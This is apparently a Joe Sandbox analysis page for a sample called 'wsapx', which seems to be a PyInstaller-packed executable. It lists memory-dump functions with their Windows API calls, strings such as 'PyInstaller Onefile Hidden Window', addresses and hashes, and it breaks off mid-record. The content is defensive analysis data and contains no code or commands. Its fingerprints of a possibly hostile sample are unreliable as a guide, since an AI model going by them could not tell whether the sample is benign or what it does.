Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 4729124711d76494614b91328dfee41258d6470ea0af0efbe755ef49afc87248
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: 2721837261864187DB62AF18E480379B6A0EBE4FB4F944234EA9D876D5DF7CD4028F10

Function 00007FF7C71C042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C0480

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: f6c624080fd01c9890cb2498434e2ff58dc09a8d64f37a1bf1b7886543d957e0
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: CF01C431A0874146EA04FF96AD0106AE695BFD5FF0F984631EE6C5BBD6DE3CE5028310

Function 00007FF7C71B9070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439

LoadLibraryExW.KERNEL32(?,00007FF7C71B6466,?,00007FF7C71B336E), ref: 00007FF7C71B9092

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
Instruction ID: 265100930ba77ffbaddfe22055f7c55f63834d38d4a1de2d8193dc48d9bf1f31
Opcode Fuzzy Hash: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
Instruction Fuzzy Hash: 30D0C211F2824542EA54BB6BBA466399661AFCDFD0FC8C035EE1D03B4ADC3CC0424B00

Function 00007FF7C71CD66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF7C71C0D00,?,?,?,00007FF7C71C236A,?,?,?,?,?,00007FF7C71C3B59), ref: 00007FF7C71CD6AA

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 6fe09de0fc86655cb88ede0b83711b0c73477b4470f958b3ba79741fac8337df
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: E2F03A10A1966657FE657FE17842274E2904FD4FB0F880230DD6E856C1DE2CA442D630

Non-executed Functions

Function 00007FF7C71B8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8C46

Part of subcall function 00007FF7C71CA4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71CA500

Part of subcall function 00007FF7C71C878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C87F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8CD6
CreateProcessW.KERNEL32 ref: 00007FF7C71B8D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8D18

Part of subcall function 00007FF7C71B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2C9E
Part of subcall function 00007FF7C71B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2D63
Part of subcall function 00007FF7C71B2C50: MessageBoxW.USER32 ref: 00007FF7C71B2D99

RegisterClassW.USER32 ref: 00007FF7C71B8D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8D7B
CreateWindowExW.USER32 ref: 00007FF7C71B8DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8E05
PeekMessageW.USER32 ref: 00007FF7C71B8E29
TranslateMessage.USER32 ref: 00007FF7C71B8E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8E41
PeekMessageW.USER32 ref: 00007FF7C71B8E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B8FF4
GetExitCodeProcess.KERNEL32 ref: 00007FF7C71B9009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B9012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7C71B3F7F), ref: 00007FF7C71B901F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF7C71B8D44
PyInstaller Onefile Hidden Window, xrefs: 00007FF7C71B8D85
Failed to create child process!, xrefs: 00007FF7C71B8D20
CreateProcessW, xrefs: 00007FF7C71B8D27

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 8708c9eeda6aeecd6e7cc5af4ea216f2604f4827efad2045f871fd21554d827b
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 69D19432A08A4287EB21AF75F8942A9B761FBD4F68F804235DE5E43A94DF3CD146C750

Function 00007FFD9476C720 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 403COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9476C844

Strings

Page %u: pointer map referenced, xrefs: 00007FFD9476CB94
Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u), xrefs: 00007FFD9476CA38
incremental_vacuum enabled with a max rootpage of zero, xrefs: 00007FFD9476C960
max rootpage (%u) disagrees with header (%u), xrefs: 00007FFD9476C93C
Page %u: never used, xrefs: 00007FFD9476CB28
Freelist: , xrefs: 00007FFD9476C8BA
Failed to read ptrmap key=%u, xrefs: 00007FFD9476CA11

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
API String ID: 3344901894-741541785
Opcode ID: b9356b5a1fbadadde7b26d0aebaef2e44b18eb42acd06dc5fd9ac9bfe1c0a29b
Instruction ID: cc8a526be6bdb834f1a46f28b38213eec66541d79b3fbf5139ca6d977ac8e8c4
Opcode Fuzzy Hash: b9356b5a1fbadadde7b26d0aebaef2e44b18eb42acd06dc5fd9ac9bfe1c0a29b
Instruction Fuzzy Hash: CC02B032B08B46CAE734CBA5D4A027D77A2FB86764F148136DA4D47B96DF39E441CB80

Function 00007FFD94623068 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFD94623084
00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD946230A8
RtlCaptureContext.KERNEL32 ref: 00007FFD946230B1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFD946230CB
RtlVirtualUnwind.KERNEL32 ref: 00007FFD9462310C
00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9462313F
IsDebuggerPresent.KERNEL32 ref: 00007FFD94623160
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFD94623181
UnhandledExceptionFilter.KERNEL32 ref: 00007FFD9462318C

Memory Dump Source

Source File: 00000002.00000002.2668800317.00007FFD94621000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFD94620000, based on PE: true

Associated: 00000002.00000002.2668762753.00007FFD94620000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD94682000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD946CE000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD946D2000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD946D7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD9472F000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD94734000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD94737000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2669246979.00007FFD94738000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2669284338.00007FFD9473A000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94620000_wsapx.jbxd

Similarity

API ID: 00007C0619ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 4003038724-0
Opcode ID: 14da1239b2aff37f2225a2b2eb9612ff8327347efab586c9ed8106aec9f5eecf
Instruction ID: 8bf6787fabff29c1b8ee5842bd09e3c8bbc0711935f6f7f1a9c6e125bcb24813
Opcode Fuzzy Hash: 14da1239b2aff37f2225a2b2eb9612ff8327347efab586c9ed8106aec9f5eecf
Instruction Fuzzy Hash: 043160B2709B8195EB748FA0E8A07ED3360FB85754F44803ADA5D87A95DF3CC588C710

Function 00007FF7C71B83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B841B
RemoveDirectoryW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B849E
DeleteFileW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84BD
FindNextFileW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84CB
FindClose.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84DC
RemoveDirectoryW.KERNEL32(?,00007FF7C71B8B09,00007FF7C71B3FA5), ref: 00007FF7C71B84E5

Strings

%s\*, xrefs: 00007FF7C71B83E2

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: 03cd2494af196f309b8c586f0a0ecbf1177fb2e78981d939d22f52a89805784c
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 69413071A0C54286EB20BF15F4886B9A3A1FBD4F64FC00636D99E42694DE3CD54B8B60

Function 00007FF7C71BD19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7C71BD1B8
RtlCaptureContext.KERNEL32 ref: 00007FF7C71BD1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7C71BD1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF7C71BD240
IsDebuggerPresent.KERNEL32 ref: 00007FF7C71BD294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7C71BD2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7C71BD2BC

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: 6a104862ae6561733dc76e785dff575b3bbab90e2287dd45460b8c10d47dd31b
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: 90311072618A8186EB649F60E8803EE7364FBD4B54F444439DA4E47B94EF3CD649CB20

Function 00007FF7C71D5C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7C71D5CB5

Part of subcall function 00007FF7C71D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D561C

Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8

Part of subcall function 00007FF7C71CA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7C71CA94F,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CA979
Part of subcall function 00007FF7C71CA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7C71CA94F,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CA99E

_get_daylight.LIBCMT ref: 00007FF7C71D5CA4

Part of subcall function 00007FF7C71D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D567C

_get_daylight.LIBCMT ref: 00007FF7C71D5F1A
_get_daylight.LIBCMT ref: 00007FF7C71D5F2B
_get_daylight.LIBCMT ref: 00007FF7C71D5F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C71D617C), ref: 00007FF7C71D5F63

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction ID: 49fe52c0efb54c8bef4b2294bfeb5a3deef8481bdeba1ae34178854efd9d065f
Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction Fuzzy Hash: F2D1A222A0825247E721FF25E8911B9E761FFE4FA4FC48136EA4D47695DF3CE4428B60

Function 00007FF7C71CA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7C71CA6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7C71CA715
RtlVirtualUnwind.KERNEL32 ref: 00007FF7C71CA750
IsDebuggerPresent.KERNEL32 ref: 00007FF7C71CA789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7C71CA793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7C71CA79E

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 4acc949ff25e1604dcca31a8d6b788e127df6e90745df49047adb14a0e0792da
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: A7316336618B8186DB61DF25F8802AEB3A4FBD4B64F940135EA8D43B54EF3CD546CB10

Function 00007FF7C71D18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D1930
FindFirstFileExW.KERNEL32 ref: 00007FF7C71D1A3A

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction ID: aaa7dcc27a9280f4d8e29648ee01561f93d4cbd44ea559ef0641044d97f803a7
Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction Fuzzy Hash: 2FB1D722B1868242EA62AF61B4401B9E3A1EBD4FF4FC54131ED4D07BC5EE3CE542DB10

Function 00007FF7C71D5EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7C71D5F1A

Part of subcall function 00007FF7C71D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D567C

_get_daylight.LIBCMT ref: 00007FF7C71D5F2B

Part of subcall function 00007FF7C71D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D561C

_get_daylight.LIBCMT ref: 00007FF7C71D5F3C

Part of subcall function 00007FF7C71D5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D564C

Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C71D617C), ref: 00007FF7C71D5F63

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction ID: a3afe653c8db7ed585f642b260b6afc0db9432d6872ccb6d41ed810dd9c4eac9
